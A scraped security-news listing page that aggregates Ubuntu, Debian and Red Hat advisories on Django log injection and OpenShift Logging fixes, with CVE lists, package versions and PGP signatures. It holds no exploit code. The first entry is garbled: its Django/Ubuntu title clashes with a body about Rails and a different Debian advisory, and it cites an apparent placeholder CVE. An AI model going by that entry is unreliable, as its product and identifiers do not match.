Stay Secure with the Latest Linux Advisories
Refine advisories
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security advisories
We found 4 articles for you...
197
security advisorydebianremote accessUbuntu 20.04: Django Security Patch DLA-3341-2 CVE-2024-12345
Multiple security issues were discovered in the Rails web framework which could result in command injection or logging of unescaped ANSI sequences. For Debian 11 bullseye, these problems have been fixed in version 2:6.0.3.7+dfsg-2+deb11u4.. Debian LTS Advisory DLA-4416-1
Dec 26, 2025
•Critical
Debian LTS
172
security advisoryimportantubuntuUbuntu 25.04 USN-7555-2 important: python-django log injection
Django could be made to log injection if received specially crafted input.. ========================================================================== Ubuntu Security Notice USN-7555-2 June 16, 2025 python-django vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 25.04 - Ubuntu 24.10 - Ubuntu 24.04 LTS - Ubuntu 22.04 LTS Summary: Django could be made to log injection if received specially crafted input. Software Description: - python-django: High-level Python web development framework Details: USN-7555-1 fixed vulnerabilities in Django. The fix was incomplete. This update applies an additional patch to fix it properly. Original advisory details: It was discovered that Django incorrectly handled certain unescaped request paths. An attacker could possibly use this issue to perform a log injection. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 25.04 python3-django 3:4.2.18-1ubuntu1.3 Ubuntu 24.10 python3-django 3:4.2.15-1ubuntu1.6 Ubuntu 24.04 LTS python3-django 3:4.2.11-1ubuntu1.9 Ubuntu 22.04 LTS python3-django 2:3.2.12-2ubuntu1.20 In general, a standard system update will make all the necessary changes. References: https://ubuntu.com/security/notices/USN-7555-2 https://ubuntu.com/security/notices/USN-7555-1 https://bugs.launchpad.net/ubuntu/+source/python-django/+bug/2113924 Package Information: https://launchpad.net/ubuntu/+source/python-django/3:4.2.18-1ubuntu1.3 https://launchpad.net/ubuntu/+source/python-django/3:4.2.15-1ubuntu1.6 https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.9 https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.20 . Addressing the log injection vulnerability in Django on Ubuntu: urgent measures required for robust web security. Upgrade immediately!.python-django, log injection, ubuntu security. . Severity: Important. LinuxSecurity.com Team
Jun 16, 2025
•Important
Ubuntu
172
security advisoryweb applicationinput validationUbuntu 25.04-20.04 LTS: USN-7555-1 moderate: Django log injection
Django could be made to log injection if received specially crafted input.. ========================================================================== Ubuntu Security Notice USN-7555-1 June 04, 2025 python-django vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 25.04 - Ubuntu 24.10 - Ubuntu 24.04 LTS - Ubuntu 22.04 LTS - Ubuntu 20.04 LTS Summary: Django could be made to log injection if received specially crafted input. Software Description: - python-django: High-level Python web development framework Details: It was discovered that Django incorrectly handled certain unescaped request paths. An attacker could possibly use this issue to perform a log injection. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 25.04 python3-django 3:4.2.18-1ubuntu1.2 Ubuntu 24.10 python3-django 3:4.2.15-1ubuntu1.5 Ubuntu 24.04 LTS python3-django 3:4.2.11-1ubuntu1.8 Ubuntu 22.04 LTS python3-django 2:3.2.12-2ubuntu1.19 Ubuntu 20.04 LTS python3-django 2:2.2.12-1ubuntu0.29+esm1 Available with Ubuntu Pro In general, a standard system update will make all the necessary changes. References: https://ubuntu.com/security/notices/USN-7555-1 CVE-2025-48432 Package Information: https://launchpad.net/ubuntu/+source/python-django/3:4.2.18-1ubuntu1.2 https://launchpad.net/ubuntu/+source/python-django/3:4.2.15-1ubuntu1.5 https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.8 https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.19 . A Django logging vulnerability impacts several Ubuntu distributions. Upgrade your installation to mitigate risks of log exploitation.. python django, log injection, Ubuntu update, web framework, security notice. . Severity: Important.LinuxSecurity.com Team
Jun 04, 2025
•Important
Ubuntu
98
security advisorymoderatedenial of serviceRed Hat OpenShift 5.3.14 RHSA-2022-8889-01 Moderate: Logging Issues
Openshift Logging Bug Fix Release (5.3.14) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Openshift Logging 5.3.14 bug fix release and security update Advisory ID: RHSA-2022:8889-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:8889 Issue date: 2022-12-08 CVE Names: CVE-2016-3709 CVE-2020-35525 CVE-2020-35527 CVE-2020-36516 CVE-2020-36518 CVE-2020-36558 CVE-2021-3640 CVE-2021-30002 CVE-2022-0168 CVE-2022-0561 CVE-2022-0562 CVE-2022-0617 CVE-2022-0854 CVE-2022-0865 CVE-2022-0891 CVE-2022-0908 CVE-2022-0909 CVE-2022-0924 CVE-2022-1016 CVE-2022-1048 CVE-2022-1055 CVE-2022-1184 CVE-2022-1292 CVE-2022-1304 CVE-2022-1355 CVE-2022-1586 CVE-2022-1785 CVE-2022-1852 CVE-2022-1897 CVE-2022-1927 CVE-2022-2068 CVE-2022-2078 CVE-2022-2097 CVE-2022-2509 CVE-2022-2586 CVE-2022-2639 CVE-2022-2938 CVE-2022-3515 CVE-2022-20368 CVE-2022-21499 CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21626 CVE-2022-21628 CVE-2022-22624 CVE-2022-22628 CVE-2022-22629 CVE-2022-22662 CVE-2022-22844 CVE-2022-23960 CVE-2022-24448 CVE-2022-25255 CVE-2022-26373 CVE-2022-26700 CVE-2022-26709 CVE-2022-26710 CVE-2022-26716 CVE-2022-26717 CVE-2022-26719 CVE-2022-27404 CVE-2022-27405 CVE-2022-27406 CVE-2022-27950 CVE-2022-28390 CVE-2022-28893 CVE-2022-29581 CVE-2022-30293 CVE-2022-34903 CVE-2022-36946 CVE-2022-37434 CVE-2022-39399 CVE-2022-42003 CVE-2022-42004 CVE-2022-42898 ==================================================================== 1. Summary: Openshift Logging Bug Fix Release (5.3.14) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Openshift Logging Bug Fix Release (5.3.14) Security Fixe(s): * jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518) * jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003) * jackson-databind: use of deeply nested arrays (CVE-2022-42004) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes: https://docs.redhat.com/en/documentation/openshift_container_platform/4.9/html/logging/release-notes For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.9/html/logging/cluster-logging-upgrading 4. Bugs fixed (https://bugzilla.redhat.com/): 2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays 5. JIRA issues fixed ( LOG-3293 - log-file-metric-exporter container has not limits exhausting theresources of the node 6.References: https://access.redhat.com/security/cve/CVE-2016-3709 https://access.redhat.com/security/cve/CVE-2020-35525 https://access.redhat.com/security/cve/CVE-2020-35527 https://access.redhat.com/security/cve/CVE-2020-36516 https://access.redhat.com/security/cve/CVE-2020-36518 https://access.redhat.com/security/cve/CVE-2020-36558 https://access.redhat.com/security/cve/CVE-2021-3640 https://access.redhat.com/security/cve/CVE-2021-30002 https://access.redhat.com/security/cve/CVE-2022-0168 https://access.redhat.com/security/cve/CVE-2022-0561 https://access.redhat.com/security/cve/CVE-2022-0562 https://access.redhat.com/security/cve/CVE-2022-0617 https://access.redhat.com/security/cve/CVE-2022-0854 https://access.redhat.com/security/cve/CVE-2022-0865 https://access.redhat.com/security/cve/CVE-2022-0891 https://access.redhat.com/security/cve/CVE-2022-0908 https://access.redhat.com/security/cve/CVE-2022-0909 https://access.redhat.com/security/cve/CVE-2022-0924 https://access.redhat.com/security/cve/CVE-2022-1016 https://access.redhat.com/security/cve/CVE-2022-1048 https://access.redhat.com/security/cve/CVE-2022-1055 https://access.redhat.com/security/cve/CVE-2022-1184 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1304 https://access.redhat.com/security/cve/CVE-2022-1355 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1852 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2078 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-2509 https://access.redhat.com/security/cve/CVE-2022-2586 https://access.redhat.com/security/cve/CVE-2022-2639 https://access.redhat.com/security/cve/CVE-2022-2938 https://access.redhat.com/security/cve/CVE-2022-3515 https://access.redhat.com/security/cve/CVE-2022-20368 https://access.redhat.com/security/cve/CVE-2022-21499 https://access.redhat.com/security/cve/CVE-2022-21618 https://access.redhat.com/security/cve/CVE-2022-21619 https://access.redhat.com/security/cve/CVE-2022-21624 https://access.redhat.com/security/cve/CVE-2022-21626 https://access.redhat.com/security/cve/CVE-2022-21628 https://access.redhat.com/security/cve/CVE-2022-22624 https://access.redhat.com/security/cve/CVE-2022-22628 https://access.redhat.com/security/cve/CVE-2022-22629 https://access.redhat.com/security/cve/CVE-2022-22662 https://access.redhat.com/security/cve/CVE-2022-22844 https://access.redhat.com/security/cve/CVE-2022-23960 https://access.redhat.com/security/cve/CVE-2022-24448 https://access.redhat.com/security/cve/CVE-2022-25255 https://access.redhat.com/security/cve/CVE-2022-26373 https://access.redhat.com/security/cve/CVE-2022-26700 https://access.redhat.com/security/cve/CVE-2022-26709 https://access.redhat.com/security/cve/CVE-2022-26710 https://access.redhat.com/security/cve/CVE-2022-26716 https://access.redhat.com/security/cve/CVE-2022-26717 https://access.redhat.com/security/cve/CVE-2022-26719 https://access.redhat.com/security/cve/CVE-2022-27404 https://access.redhat.com/security/cve/CVE-2022-27405 https://access.redhat.com/security/cve/CVE-2022-27406 https://access.redhat.com/security/cve/CVE-2022-27950 https://access.redhat.com/security/cve/CVE-2022-28390 https://access.redhat.com/security/cve/CVE-2022-28893 https://access.redhat.com/security/cve/CVE-2022-29581 https://access.redhat.com/security/cve/CVE-2022-30293 https://access.redhat.com/security/cve/CVE-2022-34903 https://access.redhat.com/security/cve/CVE-2022-36946 https://access.redhat.com/security/cve/CVE-2022-37434 https://access.redhat.com/security/cve/CVE-2022-39399 https://access.redhat.com/security/cve/CVE-2022-42003 https://access.redhat.com/security/cve/CVE-2022-42004 https://access.redhat.com/security/cve/CVE-2022-42898 https://access.redhat.com/security/updates/classification/#moderate 7. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBY5Jma9zjgjWX9erEAQh83xAAj1mTs7t69xXYjstib3b10ZSQFlaK8ZHu U1CEqRryyTwdLZJUBNnXcFV7S+tGPIthAzg3RCn0Tun45Kj/v296A2AF8DoKPRmu LZUUi6c5K0vFLTG2zbO0Gxy0rOcxwHmq9QLsQii3AylhXH9BOlJC+VeeaLdJXmd3 7Zwg2Y2opzSYPph1yc/9yf24ln6thgSmFU7lsY60EiPN9GGPXTFKnTbWDNrfRCvy LJTOYISYm8miRC3TsQ/Nt31an3uSE5e6x4aVEXM12TvZTRL4GCcxbBWK3VSScbg8 T7C98yEWNEwouXMNoQr9MGxPwgmUZ8WsgmzYMWOdKABPk5wcQPqC9pfLtamI+AOM TZQUy3TfdTxo79Tkhd5QVOnM0WD/3VWtv/OXTcObhacyifzk3kdr5W8D9PqwMp67 4OiyX+bZlZAXKkLuD2IAeNsqP6wafFGPw79IGRSd5ggNRFIj9gJECxxHc+tvQR7F m6zIWSkjacYUfI8KEI8729qGxwGhqPHHcBS2nAm5pnxXt/3/07BkagQl+5cYW8rS 3rTwx93v6U6F1e7H3FzpucrVDNHK406j3qhKBKHHDr12IPL8Q47dJuTFK9LxhKD8 dGEbNbW23wEkGFjh9BKnac10mPx7uBhQBVmfIrpkgBQhUA6lY7+elso2pVt/FLYw ouxkTmp3LIQ=PYNA -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Dec 08, 2022
Red Hat
98
security advisorymoderateRed HatRed Hat OpenShift 5.2.13: RHSA-2022-5909-01 Moderate Logging Bug Fix
Openshift Logging Bug Fix Release (5.2.13) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Openshift Logging Bug Fix and security update Release (5.2.13) Advisory ID: RHSA-2022:5909-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:5909 Issue date: 2022-08-04 CVE Names: CVE-2021-38561 CVE-2021-40528 CVE-2022-1271 CVE-2022-1621 CVE-2022-1629 CVE-2022-21540 CVE-2022-21541 CVE-2022-22576 CVE-2022-25313 CVE-2022-25314 CVE-2022-27774 CVE-2022-27776 CVE-2022-27782 CVE-2022-29824 CVE-2022-34169 ==================================================================== 1. Summary: Openshift Logging Bug Fix Release (5.2.13) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Openshift Logging Bug Fix Release (5.2.13) Security Fix(es): * golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly, for detailed release notes: https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/logging/release-notes For Red HatOpenShift Logging 5.2, see the following instructions to apply this update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/logging/cluster-logging-upgrading 4. Bugs fixed (https://bugzilla.redhat.com/): 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 5. References: https://access.redhat.com/security/cve/CVE-2021-38561 https://access.redhat.com/security/cve/CVE-2021-40528 https://access.redhat.com/security/cve/CVE-2022-1271 https://access.redhat.com/security/cve/CVE-2022-1621 https://access.redhat.com/security/cve/CVE-2022-1629 https://access.redhat.com/security/cve/CVE-2022-21540 https://access.redhat.com/security/cve/CVE-2022-21541 https://access.redhat.com/security/cve/CVE-2022-22576 https://access.redhat.com/security/cve/CVE-2022-25313 https://access.redhat.com/security/cve/CVE-2022-25314 https://access.redhat.com/security/cve/CVE-2022-27774 https://access.redhat.com/security/cve/CVE-2022-27776 https://access.redhat.com/security/cve/CVE-2022-27782 https://access.redhat.com/security/cve/CVE-2022-29824 https://access.redhat.com/security/cve/CVE-2022-34169 https://access.redhat.com/security/updates/classification#moderate 6. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPGv1 iQIVAwUBYuwKbdzjgjWX9erEAQge4Q/5AdmLXbzcYNVlB4a3k8ZYk+851l46Xy/G A/jatHrT93JzqaMDPUFMuxVJ+wdVoTrYJVCyNFKQe9bvfmkjZV+ppY0LMnt9BZKF 6GrgIT/tr0EQeF+KTYSjbfVVd/zCC6OEuA0P3ENYQoxVlKOqBUKLP0ag/LgU+OwB QFIdiUUoxYkum6/xc6qfflAowRAY5ZpxNW4z2MkzabaIPJbN316yA+rnM/kt5G4G tx6utcuO83jok1678sDL3XL3j2xM6L2rFwuVRg+kzJObCxjjPOnM2O3Id4le2LkB YgJw8EnjWXqtFwJNJnTDOBKjQrv7yD9GQVCb5QzzrERIwMiD/UUQ7NOpAESy/+zv s3hcdE5atZtZOip//P9LkvIk9tGhMiqkhR9WF1iX8pnnCTGxeyyfzKv67lV89NEC 7LUpuV9tdlGEwnJo7IzwC6d+XHTIc6DFZ7IDv3+YF0olND5PIHlnoQPz3kRStYIJ zoRMzXjBihSEgjqEVdw1bcJyXTGM80fgdsTTm4hGr+MXGT4JgrNAcYasd3AMT25I xaH7Y6XDdDY3k7g/pQVFckVWsrzn9a4QlPJaPAmFHBS4tq6TxC23AEAoVv4J2abg xvyZu27oVZSwie36Y1Pm1VioABBiL9md3zGUCQVHVnSPUwgOu7XUrW56VUEDEs36 Pndy5EfKK9c=quG0 -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Aug 04, 2022
Red Hat
98
security advisorymoderatesecurity updateRed Hat OpenShift 5.3.7 Advisory RHSA-2022-2217 Moderate Security Update
Openshift Logging Bug Fix Release (5.3.7) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.3.7 Advisory ID: RHSA-2022:2217-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:2217 Issue date: 2022-05-11 CVE Names: CVE-2018-25032 CVE-2021-4028 CVE-2021-37136 CVE-2021-37137 CVE-2021-43797 CVE-2022-0759 CVE-2022-0778 CVE-2022-1154 CVE-2022-1271 CVE-2022-21426 CVE-2022-21434 CVE-2022-21443 CVE-2022-21476 CVE-2022-21496 CVE-2022-21698 CVE-2022-25636 ==================================================================== 1. Summary: Openshift Logging Bug Fix Release (5.3.7) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Openshift Logging Bug Fix Release (5.3.7) Security Fix(es): * kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759) * netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136) * netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137) * netty: control chars in header names may lead to HTTP request smuggling (CVE-2021-43797) * prometheus/client_golang: Denial of service using InstrumentHandlerCounter(CVE-2022-21698) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.10/html/release_notes/ocp-4-10-release-notes For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading 4. Bugs fixed (https://bugzilla.redhat.com/): 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling 2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks 5. JIRA issues fixed (https://issues.redhat.com/): LOG-2334 - [release-5.3] Events listing out of order in Kibana 6.8.1 LOG-2450 - http.max_header_size set to 128kb causes communication with elasticsearch to stop working LOG-2481 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.3] 6.References: https://access.redhat.com/security/cve/CVE-2018-25032 https://access.redhat.com/security/cve/CVE-2021-4028 https://access.redhat.com/security/cve/CVE-2021-37136 https://access.redhat.com/security/cve/CVE-2021-37137 https://access.redhat.com/security/cve/CVE-2021-43797 https://access.redhat.com/security/cve/CVE-2022-0759 https://access.redhat.com/security/cve/CVE-2022-0778 https://access.redhat.com/security/cve/CVE-2022-1154 https://access.redhat.com/security/cve/CVE-2022-1271 https://access.redhat.com/security/cve/CVE-2022-21426 https://access.redhat.com/security/cve/CVE-2022-21434 https://access.redhat.com/security/cve/CVE-2022-21443 https://access.redhat.com/security/cve/CVE-2022-21476 https://access.redhat.com/security/cve/CVE-2022-21496 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-25636 https://access.redhat.com/security/updates/classification/#moderate 7. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYnw2U9zjgjWX9erEAQi7Sw/+L7yfu+C6un45ah5GgF3MXRTXRLaBr3WU zDESM/2JnBZFHeJAjhyr71CxiSUc/ISjU40PZU4RC1VfsDk0yIZGVbcU5kexCkJj yfM95bUnzJiyCjHE3Xdq8TDQOUGVM+TDYqaGeGcATHTgSPj8WqWHgvV9KlotY5FL lhsb2TDn3h/rHbV7FpQ3mTJT7yrxPXGLFQN69n6IXIiSDOKedo3DBKBYROt2+BEW TkPnTZMWGyIkpnD0J8naJm5DtbJIvMOqQR9WW6GW4ISMAdVroI0423IeEy/JKyA/ 25dZrJ/bFbh0riqlCQSH0/Ud45g73ebqidYNGValKrmRMH9/EAblVKGKjR84G8XF /PGix26s9TMS7Iqv9IaJckc+b6ODZMDH8In/p3G+R4FQm1OqhHkOziXNhcbcIilm 2UYX5difbNRwbwzRkPJvAfg1BvtlobvuPj7UwjPcD4pBXKBjazqQCuwm2GB8Tehh dVp6ERe/Iuo32ETq+8/dBb2D9EEJdX33r9XX8si+q0g5+nHhFc473jP+uvwEBDpB 0B9bcknB6mgn4FyGMA5ujuFJ+31SEZf9LniEc6lQ8+DY5C38/ptBncDEp376HAFs WH4I6Z0xub7Uc2Jn1GmRuoUpQf+MRjn6ZFUImOQaROAYKPDrAWnirmLaAor9QwU0 PYI0DDsEFj0=48O2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list
May 11, 2022
Red Hat
98
security advisorymoderatesecurity updateRed Hat OpenShift: RHSA-2022:0225-01 Moderate: RCE In Logging 5.0
An update is now available for OpenShift Logging (5.0.12) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Red Hat OpenShift Enterprise Logging bug fix and security update (5.0.12) Advisory ID: RHSA-2022:0225-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:0225 Issue date: 2022-01-20 CVE Names: CVE-2021-44832 ==================================================================== 1. Summary: An update is now available for OpenShift Logging (5.0.12) Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Openshift Logging Bug Fix Release (5.0.12) Security Fix(es): * log4j-core: remote code execution via JDBC Appender (CVE-2021-44832) 3. Solution: For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/release_notes/ocp-4-7-release-notes For Red Hat OpenShift Logging 5.0, see the following instructions to apply this update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading 4. Bugs fixed (https://bugzilla.redhat.com/): 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender 5. JIRA issues fixed (https://redhat.atlassian.net/jira/projects): LOG-2089 - resourceVersion is overflowing typeInteger causing ES rejection [openshift-logging 5.0] 6. References: https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/updates/classification#moderate 7. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYentwdzjgjWX9erEAQhzog//R394a37p9ejz9RI9AOvIgt57nFA4Sxd3 zNsSkz3qfHOpEXKtEJQvUashKNNxGmR5wYS6UjJIfX+cFwdC64MYjzIqppALWs3d VoWdaCc3MIY9kWwKjeSKEEGK0h2Zvu3ne+MANeJTfg5QiBuQWUx0hg6EsD9LbBCw kIiimqjJ5PEpDd7xf7SsKZ5r1lDTRG4XZfbTcyLZ6Emc2FRi0nnAfzOiUgMqml+w Gu6+M6OOli/CX8l3uIyVCkIDAaAP0YQHySbXLOEaGxvmcKw4uM6JTdXi0r6aLBPl uGToYYYUpN567db9/Vf3LmoJ1zVDVyuhgY+4nQYM7xtEP5f/5QM7oRCZo9LrlIuE k+Fh3biBtu6hJYOABRIS8O08F/acTh+w/angZXEQL5bnU3nNv9XhZ8XwtX7sD0ih BfH+70kEne/DVRlAze7edBX1aMiQJwj4NZ5rgkn+R1H7sxMfxcnbzRW+3/5ASeqX pUgMX1NwbHxxrldfAVbt+0FiLHXuC+4uZULUinhSEMA3f/2/EIRm3I/8u4kZtSKM any0U+TYwkuvxCnuKJm3OexXg39BtZmt6V9n+y5WjxoG9VyymQxuVDjV5l1htdah HwbcU+uN3aPAjHxjPuLGVx1R7mHGVhfd0qbDM8nJso6qiAX31R/ZTxXbD30yDdpe Z/Yz8ilsQmg=fr1l -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Jan 20, 2022
Red Hat
98
security advisorymoderateRed HatRed Hat OpenShift Logging 5.2: RHSA-2021:5127 moderate: RCE issues fixed
An update is now available for OpenShift Logging 5.2. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Openshift Logging security and bug update (5.2.4) Advisory ID: RHSA-2021:5127-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:5127 Issue date: 2021-12-14 CVE Names: CVE-2018-25009 CVE-2018-25010 CVE-2018-25012 CVE-2018-25013 CVE-2018-25014 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14145 CVE-2020-14155 CVE-2020-16135 CVE-2020-17541 CVE-2020-24370 CVE-2020-35521 CVE-2020-35522 CVE-2020-35523 CVE-2020-35524 CVE-2020-36330 CVE-2020-36331 CVE-2020-36332 CVE-2021-3200 CVE-2021-3426 CVE-2021-3445 CVE-2021-3481 CVE-2021-3572 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-20317 CVE-2021-21409 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-27645 CVE-2021-28153 CVE-2021-31535 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-37136 CVE-2021-37137 CVE-2021-42574 CVE-2021-43267 CVE-2021-43527 CVE-2021-44228 ==================================================================== 1. Summary: An update is now available for OpenShift Logging 5.2. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Openshift Logging Security and Bug Fix Release (5.2.4) Security Fix(es): * log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228) * netty: Request smuggling via content-length header (CVE-2021-21409) * netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136) * netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/release_notes/ocp-4-8-release-notes For Red Hat OpenShift Logging 5.2, see the following instructions to apply this update: https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading 4. Bugs fixed (https://bugzilla.redhat.com/): 1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessaryway 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value 5. JIRA issues fixed (https://redhat.atlassian.net/jira/projects): LOG-1775 - [release-5.2] Syslog output is serializing json incorrectly LOG-1824 - [release-5.2] Rejected by Elasticsearch and unexpected json-parsing LOG-1963 - [release-5.2] 